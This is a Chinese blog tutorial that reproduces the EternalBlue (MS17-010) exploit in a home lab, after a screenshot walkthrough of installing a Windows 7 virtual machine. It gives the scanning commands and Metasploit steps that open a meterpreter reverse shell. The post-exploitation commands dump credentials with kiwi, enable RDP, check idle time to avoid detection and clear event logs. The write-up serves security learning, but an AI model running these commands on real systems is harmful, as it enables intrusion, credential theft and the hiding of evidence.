<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="永恒之蓝复现(附带win7虚拟机安装教程), RE,Misc,Web,Cpypto等">
    <meta name="description" content="Win7虚拟机安装首先进入该网站  https://msdn.itellyou.cn/

下载一个win7 iso镜像，然后打开Vmware
第一步

第二步

第三步

第四步

第五步

第六步、选择BIOS

第七步、选择处理器数量
">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>永恒之蓝复现(附带win7虚拟机安装教程) | Know5</title>
    <link rel="icon" type="image/png" href="/1.png">
    
    <style>
        body{
            background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
            background-repeat:no-repeat;
            background-size: 100% 100%;
            background-attachment:fixed;
        }
    </style>



    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    
        <link rel="stylesheet" type="text/css" href="/css/reward.css">
    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/avatar.jpg" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Know5</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/avatar.jpg" class="logo-img circle responsive-img">
        
        <div class="logo-name">Know5</div>
        <div class="logo-desc">
            
            注重于代码学习，网安学习，分享经验，分享知识。
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/20.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">永恒之蓝复现(附带win7虚拟机安装教程)</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%99%9A%E6%8B%9F%E6%9C%BA/">
                                <span class="chip bg-color">漏洞，虚拟机</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-08-11
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-08-14
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    971
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.min.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="Win7虚拟机安装"><a href="#Win7虚拟机安装" class="headerlink" title="Win7虚拟机安装"></a>Win7虚拟机安装</h3><p>首先进入该网站  <a target="_blank" rel="noopener" href="https://msdn.itellyou.cn/">https://msdn.itellyou.cn/</a></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112029452.png"></p>
<p>下载一个win7 iso镜像，然后打开Vmware</p>
<p><strong>第一步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112030084.png"></p>
<p><strong>第二步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112033933.png"></p>
<p><strong>第三步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112033763.png"></p>
<p><strong>第四步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112034601.png"></p>
<p><strong>第五步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112034620.png"></p>
<p><strong>第六步、选择BIOS</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112035984.png"></p>
<p><strong>第七步、选择处理器数量</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112038769.png"></p>
<p><strong>第八步、选择内存大小</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112036106.png"></p>
<p><strong>第九步、选择桥接网络</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112038948.png"></p>
<p><strong>第十步、按推荐来就行</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112039895.png"></p>
<p><strong>第十一步、按推荐来就行</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112040219.png"></p>
<p><strong>第十二步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112041703.png"></p>
<p><strong>第十三步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112041787.png"></p>
<p><strong>第十四步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112042955.png"></p>
<p>然后完成即可</p>
<p><strong>第十五步、在CD&#x2F;DVD中选择镜像文件</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112044247.png"></p>
<p>然后开机</p>
<p><strong>第十六步、下一步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112045752.png"></p>
<p>下一步后直接现在安装</p>
<p><strong>第十七步、选择接受和下一步</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112047671.png"></p>
<p><strong>第十八步、选择自定义(高级)</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112047900.png"></p>
<p><strong>第十九步、下一步即可</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112049363.png"></p>
<p><strong>第二十步、取个用户名</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112056351.png"></p>
<p><strong>第二十一步、设置密码</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112057736.png"></p>
<p><strong>第二十二步、直接下一步就行</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112058488.png"></p>
<p><strong>第二十三步、使用推荐设置</strong></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112059842.png"></p>
<p>后面跟随系统指引即可</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112100185.png"></p>
<h3 id="准备环境"><a href="#准备环境" class="headerlink" title="准备环境"></a>准备环境</h3><blockquote>
<p>攻击机：kali</p>
<p>ip地址：192.168.1.17</p>
</blockquote>
<blockquote>
<p>被攻击机：window 7</p>
<p>ip地址：192.168.1.18</p>
</blockquote>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>一、先测试能否相互ping通</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141617217.png"></p>
<p>![](<a target="_blank" rel="noopener" href="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112111556.png">https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112111556.png</a></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308112111583.png"></p>
<p>二、在kali上用nmap扫描局域网内主机</p>
<pre class="line-numbers language-lua" data-language="lua"><code class="language-lua">nmap -sP 192.168.1.1&#x2F;24<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>发现被攻击机</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141618780.png"></p>
<p>三、扫描端口查看其运行的服务</p>
<pre class="line-numbers language-lua" data-language="lua"><code class="language-lua">nmap -p 1-65535 -A 192.168.1.18<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141620919.png"></p>
<pre class="line-numbers language-lua" data-language="lua"><code class="language-lua">masscan --rate&#x3D;10000 -p1-65535 192.168.1.18<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141616556.png"></p>
<p>发现445端口  正是永恒之蓝利用的便是445端口中的SMB服务获取系统的最高权限</p>
<p>四、进行漏洞扫描</p>
<pre class="line-numbers language-lua" data-language="lua"><code class="language-lua">nmap --script&#x3D;vuln 192.168.1.18<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141625140.png"></p>
<p>扫描的漏洞中包括<strong>MS17-010漏洞</strong></p>
<p>五、进入MSF控制台</p>
<pre class="line-numbers language-kali" data-language="kali"><code class="language-kali">msfconsole<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>寻找我们刚才扫描到的 <strong>MS17-010漏洞</strong></p>
<pre class="line-numbers language-msf" data-language="msf"><code class="language-msf">search ms17-010<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141628161.png"></p>
<p>在其中</p>
<p>3代表着永恒之蓝扫描模块,探测主机是否存在永恒之蓝的漏洞</p>
<p>0代表着永恒之蓝攻击模块，用于攻击目标用户，</p>
<p>数字需要自己判断你自己的攻击模块在哪，每个人都不一样</p>
<p>加载扫描模块</p>
<pre class="line-numbers language-ruby" data-language="ruby"><code class="language-ruby">use 3   
use auxiliary&#x2F;scanner&#x2F;smb&#x2F;smb_ms17_010       &#x2F;&#x2F;俩者皆可，输入一个就行

show options    &#x2F;&#x2F;查看该模块所需的参数配置<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141633575.png"></p>
<p>发现其RHOSTS尚未配置</p>
<p>设置攻击目标的ip</p>
<pre class="line-numbers language-ruby" data-language="ruby"><code class="language-ruby">set rhosts 192.168.1.18
设置后执行扫描
run           &#x2F;&#x2F;进行扫描<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141635700.png"></p>
<p>说明可以进行攻击，但是我们上面其实已经扫过该目标靶机里面有永恒之蓝漏洞</p>
<p>六、使用攻击模块</p>
<pre class="line-numbers language-ruby" data-language="ruby"><code class="language-ruby">use 0    
use exploit&#x2F;windows&#x2F;smb&#x2F;ms17_010_eternalblue    &#x2F;&#x2F;使用一个即可
show options    
set rhosts 192.168.1.18   &#x2F;&#x2F;设置目标主机ip
set payload windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp  &#x2F;&#x2F;设置payload
set lhost 192.168.1.17   &#x2F;&#x2F;设置攻击机ip 
run  或  exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141644517.png"></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141646012.png"></p>
<p>运行成功会出现meterpreter控制台，并在结尾处出现 WIN  这时候我们就已经拿到权限并且可以使用</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141649007.png"></p>
<h3 id="演示功能"><a href="#演示功能" class="headerlink" title="演示功能"></a>演示功能</h3><h4 id="一、屏幕截取"><a href="#一、屏幕截取" class="headerlink" title="一、屏幕截取"></a>一、屏幕截取</h4><pre class="line-numbers language-none"><code class="language-none">screenshot<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141654891.png"></p>
<h4 id="二、上传-x2F-下载文件"><a href="#二、上传-x2F-下载文件" class="headerlink" title="二、上传&#x2F;下载文件"></a>二、上传&#x2F;下载文件</h4><p>上传文件</p>
<pre class="line-numbers language-none"><code class="language-none">upload 1.txt c:&#x2F;&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141656746.png"></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141657662.png"></p>
<p>下载文件</p>
<pre class="line-numbers language-none"><code class="language-none">download c:&#x2F;&#x2F;2.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141706192.png"></p>
<h4 id="三、获取CMD"><a href="#三、获取CMD" class="headerlink" title="三、获取CMD"></a>三、获取CMD</h4><p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141712539.png"></p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141713076.png"></p>
<h4 id="四、获取用户密码"><a href="#四、获取用户密码" class="headerlink" title="四、获取用户密码"></a>四、获取用户密码</h4><pre class="line-numbers language-none"><code class="language-none">load kiwi<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141715113.png"></p>
<pre class="line-numbers language-none"><code class="language-none">creds_all<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141716805.png"></p>
<p>启用远程桌面</p>
<pre class="line-numbers language-none"><code class="language-none">run post&#x2F;windows&#x2F;manage&#x2F;enable_rdp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141717749.png"></p>
<p>查看用户空闲时间，以防将其顶掉被发现</p>
<pre class="line-numbers language-none"><code class="language-none">idletime<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>然后调到kali的管理员终端</p>
<pre class="line-numbers language-none"><code class="language-none">rdesktop 192.168.1.18<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141725948.png"></p>
<p>原账户被顶掉，当然也可以利用自己提权然后自己新创一个用户登录</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141724467.png"></p>
<h4 id="五、清理日志"><a href="#五、清理日志" class="headerlink" title="五、清理日志"></a>五、清理日志</h4><p>清理前</p>
<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141729848.png"></p>
<p>清理后</p>
<pre class="line-numbers language-none"><code class="language-none">clearev        &#x2F;&#x2F;在meterpreter上<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://dao-1-1317774468.cos.ap-nanjing.myqcloud.com/images/202308141730360.png"></p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>以上就是我对永恒之蓝的复现</p>
<p>参考链接：<a target="_blank" rel="noopener" href="https://blog.csdn.net/ElsonHY/article/details/109939420">MS17-010（Eternal blue永恒之蓝）漏洞利用+修复方法_RDrug的博客-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_62584974/article/details/126322675">MS17-010漏洞复现（带win7虚拟机安装，零基础）_永恒之蓝镜像_墨言ink的博客-CSDN博客</a></p>
<p>从大佬的博客中学到很多，也对这个漏洞更加了解。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Know5</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://know5.github.io/2023/08/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E5%A4%8D%E7%8E%B0-%E9%99%84%E5%B8%A6win7%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/">https://know5.github.io/2023/08/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E5%A4%8D%E7%8E%B0-%E9%99%84%E5%B8%A6win7%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Know5</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%99%9A%E6%8B%9F%E6%9C%BA/">
                                    <span class="chip bg-color">漏洞，虚拟机</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2023/08/11/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D%E5%A4%8D%E7%8E%B0-%E9%99%84%E5%B8%A6win7%E8%99%9A%E6%8B%9F%E6%9C%BA%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/20.jpg" class="responsive-img" alt="永恒之蓝复现(附带win7虚拟机安装教程)">
                        
                        <span class="card-title">永恒之蓝复现(附带win7虚拟机安装教程)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-08-11
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Know5
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%99%9A%E6%8B%9F%E6%9C%BA/">
                        <span class="chip bg-color">漏洞，虚拟机</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/07/30/Pikachu%E9%9D%B6%E5%9C%BA%E5%85%A8%E9%80%9A%E5%85%B3%E6%80%9D%E8%B7%AF/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/10.jpg" class="responsive-img" alt="Pikachu靶场全通关思路">
                        
                        <span class="card-title">Pikachu靶场全通关思路</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-07-30
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Know5
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/WEB-%E5%8D%81%E5%A4%A7%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E-%E5%AD%A6%E4%B9%A0%E5%BF%83%E5%BE%97/">
                        <span class="chip bg-color">WEB,十大常见漏洞,学习心得</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>


  <!-- 是否加载使用自带的 prismjs. -->
  <script type="text/javascript" src="/libs/prism/prism.min.js"></script>


<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

